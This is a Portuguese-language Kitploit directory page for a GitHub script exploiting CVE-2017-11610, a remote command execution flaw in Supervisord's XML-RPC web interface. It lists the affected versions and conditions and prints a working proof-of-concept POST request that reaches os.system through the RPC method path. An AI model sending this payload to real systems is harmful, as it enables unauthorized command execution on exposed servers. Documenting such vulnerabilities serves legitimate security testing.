Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-11610 — Script de vulnerabilidade de execução remota de comandos no Supervisord | Kitploit
Ferramentas/GitHubGitHub/yaunsky/cve-2017-11610
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubyaunsky/cve-2017-11610

CVE-2017-11610

Script de vulnerabilidade de execução remota de comandos no Supervisord

Ver Repositório
42há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Script para a vulnerabilidade de execução remota de comandos no Supervisord (CVE-2017-11610)

Introdução à vulnerabilidade

Supervisor é uma ferramenta de gerenciamento de processos escrita em Python, que pode ser convenientemente usada para iniciar, reiniciar (reiniciar programas automaticamente) e encerrar processos em sistemas UNIX-like (sem suporte a Windows) — não apenas processos Python.

Supervisor é um programa no modelo C/S; supervisord é o lado do servidor e supervisorctl é o lado do cliente. De forma simples, o cliente insere comandos do supervisor para chamar a API do lado do servidor, realizando assim algumas tarefas.

O serviço Web do Supervisor, na verdade, é bastante utilizado por muitas pessoas; é o cliente do supervisord. Desde que a rota esteja acessível, é possível realizar remotamente, por meio da página Web, operações semelhantes às do client do supervisor. As operações pela interface Web são implementadas pela interface XML-RPC, e essa vulnerabilidade também está no tratamento de dados dessa interface XML-RPC.

Condições de exploração

Supervisor versão 3.1.2 até a versão 3.3.2

Serviço Web ativado e porta 9001 acessível

Senha fraca ou em branco

POC

root@kitploit:~
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>

Este PoC não produz saída.

Script com saída

a

Baixar ferramenta